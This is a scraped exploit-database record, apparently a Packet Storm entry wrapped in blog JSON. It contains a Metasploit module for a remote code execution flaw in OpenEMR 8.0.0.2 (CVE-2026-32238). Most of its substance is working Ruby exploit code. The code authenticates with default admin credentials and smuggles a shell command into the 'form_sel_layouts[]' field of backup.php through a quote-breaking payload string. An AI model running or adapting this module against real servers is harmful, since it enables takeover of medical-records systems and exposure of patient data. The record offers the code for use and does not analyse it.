{“lastseen”:”2026-04-20T15:54:47″,”description”:”This Metasploit exploit module targets a potential remote code execution vulnerability in OpenEMR systems identified as CVE-2026-32238. The module combines authentication handling, HTTP request manipulation, and command injection capabilities to…”,”published”:”2026-04-20T00:00:00″,”modified”:”2026-04-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenEMR 8.0.0.2 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:219177″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-32238″],”sourceData”:”==================================================================================================================================\\n | # Title : OpenEMR 8.0.0.2 Remote Code Execution Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.open-emr.org\/wiki\/index.php\/OpenEMR_Downloads |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit exploit module targets a potential Remote Code Execution (RCE) vulnerability in OpenEMR systems identified as CVE-2026-32238. \\n The module combines authentication handling, HTTP request manipulation, and command injection capabilities to achieve remote command execution on vulnerable installations.\\n \\n [+] POC : \\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n include Msf::Exploit::FileDropper\\n \\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘OpenEMR CVE-2026-32238 RCE ‘,\\n ‘Description’ =\\u003e ‘Remote Code Execution Module’,\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE\\n ))\\n \\n register_options([\\n Opt::RPORT(443),\\n OptBool.new(‘SSL’, [true, ‘SSL’, true]),\\n OptString.new(‘TARGETURI’, [true, ‘Path’, ‘\/openemr\/’]),\\n OptString.new(‘USERNAME’, [true, ‘User’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, ‘Pass’, ‘admin’]),\\n OptInt.new(‘TIMEOUT’, [true, ‘Timeout’, 10])\\n ])\\n \\n @cookie = nil\\n end\\n \\n def uri(path)\\n normalize_uri(datastore[‘TARGETURI’], path)\\n end\\n \\n def authenticate\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e uri(‘interface\/main\/main_screen.php’),\\n ‘vars_post’ =\\u003e {\\n ‘authUser’ =\\u003e datastore[‘USERNAME’],\\n ‘clearPass’ =\\u003e datastore[‘PASSWORD’]\\n },\\n ‘timeout’ =\\u003e datastore[‘TIMEOUT’]\\n })\\n \\n return false unless res\\n \\n if res.get_cookies =~ \/OpenEMR=([^;]+)\/\\n @cookie = \\”OpenEMR=#{$1}\\”\\n return true\\n end\\n \\n false\\n end\\n \\n def inject(cmd)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e uri(‘interface\/main\/backup.php’),\\n ‘cookie’ =\\u003e @cookie,\\n ‘vars_post’ =\\u003e {\\n ‘form_step’ =\\u003e ‘102’,\\n ‘form_sel_layouts[]’ =\\u003e cmd\\n },\\n ‘timeout’ =\\u003e datastore[‘TIMEOUT’]\\n })\\n \\n res \\u0026\\u0026 res.code == 200\\n end\\n \\n def execute_command(cmd, _opts = {})\\n payload = \\”LBF\\\\\\”‘;#{cmd} #\\”\\n \\n print_status(\\”Injecting: #{cmd}\\”)\\n \\n unless inject(payload)\\n fail_with(Failure::NotVulnerable, ‘Injection failed’)\\n end\\n end\\n \\n def exploit\\n unless authenticate\\n fail_with(Failure::NoAccess, ‘Auth failed’)\\n end\\n \\n print_status(\\”Target: #{rhost}\\”)\\n \\n execute_command(payload.encoded)\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219177″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219177\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-20T15:54:47″,”description”:”This Metasploit exploit module targets a potential remote code execution vulnerability in OpenEMR systems identified as CVE-2026-32238. The module combines authentication handling, HTTP request manipulation,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-48075","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n